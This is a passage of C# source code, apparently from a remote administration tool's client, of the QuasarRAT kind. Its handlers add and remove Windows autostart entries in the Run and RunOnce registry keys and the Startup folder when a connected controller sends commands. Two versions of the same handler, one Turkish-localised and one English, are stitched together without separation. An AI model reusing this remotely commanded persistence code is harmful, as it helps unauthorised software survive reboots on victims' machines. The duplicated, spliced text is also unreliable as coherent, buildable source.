throw new Exception("Değer Eklenemedi");
}
break;
case 6:
if (!Directory.Exists(Environment.GetFolderPath(Environment.SpecialFolder.Startup)))
{
Directory.CreateDirectory(Environment.GetFolderPath(Environment.SpecialFolder.Startup));
}
string lnkPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Startup),
command.Name + ".url");
using (var writer = new StreamWriter(lnkPath, false))
{
writer.WriteLine("[InternetShortcut]");
writer.WriteLine("URL=file:///" + command.Path);
writer.WriteLine("IconIndex=0");
writer.WriteLine("IconFile=" + command.Path.Replace('\\', '/'));
writer.Flush();
}
break;
}
}
catch (Exception ex)
{
new SetStatus(string.Format("Oto-Başlangıç Öğesi Ekleme Başarısız: {0}", ex.Message)).Execute(client);
}
}
public static void HandleDoStartupItemRemove(DoStartupItemRemove command, Client client)
{
try
{
switch (command.Type)
{
case 0:
if (!RegistryKeyHelper.DeleteRegistryKeyValue(RegistryHive.LocalMachine,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", command.Name))
{
throw new Exception("Değer Kaldırılamadı");
}
break;
case 1:
if (!RegistryKeyHelper.DeleteRegistryKeyValue(RegistryHive.LocalMachine,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", command.Name))
{
throw new Exception("Değer Kaldırılamadı");
}
break;
case 2:
if (!RegistryKeyHelper.DeleteRegistryKeyValue(RegistryHive.CurrentUser,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", command.Name))
{
throw new Exception("Değer Kaldırılamadı");
}
break;
case 3:
if (!RegistryKeyHelper.DeleteRegistryKeyValue(RegistryHive.CurrentUser,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", command.Name))
{
throw new Exception("Değer Kaldırılamadı");
}
break;
case 4:
if (!PlatformYardımcısı.A64Bitmi)
{
throw new NotSupportedException(
"Bu İşlem Sadece 64 Bit İşletim Sistemlerinde Destekleniyor.");
}
if (!RegistryKeyHelper.DeleteRegistryKeyValue(RegistryHive.LocalMachine,
"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run", command.Name))
{
throw new Exception("Değer Kaldırılamadı");
}
break;
case 5:
if (!PlatformYardımcısı.A64Bitmi)
{
throw new NotSupportedException(
"Bu İşlem Sadece 64 Bit İşletim Sistemlerinde Destekleniyor.");
}
if (!RegistryKeyHelper.DeleteRegistryKeyValue(RegistryHive.LocalMachine,
"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce", command.Name))
{
throw new Exception("Değer Kaldırılamadı");
}
break;
case 6:
var startupItemPath = Path.Combine(
Environment.GetFolderPath(Environment.SpecialFolder.Startup), command.Name);
if (!File.Exists(startupItemPath))
{
throw new IOException("Böyle Bir Dosya Bulunmuyor.");
}
File.Delete(startupItemPath);
break;
}
}
catch (Exception ex)
{
new SetStatus(string.Format("Oto-Başlangıç Öğesi Kaldırma Başarısız: {0}", ex.Message)).Execute(client);
}
}
private void Execute(ISender client, DoStartupItemAdd message)
{
try
{
switch (message.StartupItem.Type)
{
case StartupType.LocalMachineRun:
if (!RegistryKeyHelper.AddRegistryKeyValue(RegistryHive.LocalMachine,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", message.StartupItem.Name, message.StartupItem.Path, true))
{
throw new Exception("Could not add value");
}
break;
case StartupType.LocalMachineRunOnce:
if (!RegistryKeyHelper.AddRegistryKeyValue(RegistryHive.LocalMachine,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", message.StartupItem.Name, message.StartupItem.Path, true))
{
throw new Exception("Could not add value");
}
break;
case StartupType.CurrentUserRun:
if (!RegistryKeyHelper.AddRegistryKeyValue(RegistryHive.CurrentUser,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", message.StartupItem.Name, message.StartupItem.Path, true))
{
throw new Exception("Could not add value");
}
break;
case StartupType.CurrentUserRunOnce:
if (!RegistryKeyHelper.AddRegistryKeyValue(RegistryHive.CurrentUser,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", message.StartupItem.Name, message.StartupItem.Path, true))
{
throw new Exception("Could not add value");
}
break;
case StartupType.LocalMachineWoW64Run:
if (!PlatformHelper.Is64Bit)
{
throw new NotSupportedException("Only on 64-bit systems supported");
}
if (!RegistryKeyHelper.AddRegistryKeyValue(RegistryHive.LocalMachine,
"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run", message.StartupItem.Name, message.StartupItem.Path, true))
{
throw new Exception("Could not add value");
}
break;
case StartupType.LocalMachineWoW64RunOnce:
if (!PlatformHelper.Is64Bit)
{
throw new NotSupportedException("Only on 64-bit systems supported");
}
if (!RegistryKeyHelper.AddRegistryKeyValue(RegistryHive.LocalMachine,
"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce", message.StartupItem.Name, message.StartupItem.Path, true))
{
throw new Exception("Could not add value");
}
break;
case StartupType.StartMenu:
if (!Directory.Exists(Environment.GetFolderPath(Environment.SpecialFolder.Startup)))
{
Directory.CreateDirectory(Environment.GetFolderPath(Environment.SpecialFolder.Startup));
}
string lnkPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Startup),
message.StartupItem.Name + ".url");
using (var writer = new StreamWriter(lnkPath, false))
{
writer.WriteLine("[InternetShortcut]");
writer.WriteLine("URL=file:///" + message.StartupItem.Path);
writer.WriteLine("IconIndex=0");
writer.WriteLine("IconFile=" + message.StartupItem.Path.Replace('\\', '/'));
writer.Flush();
}
break;
}
}
catch (Exception ex)
{
client.Send(new SetStatus {
Message = $"Adding Autostart Item failed: {ex.Message}"
});
}
}
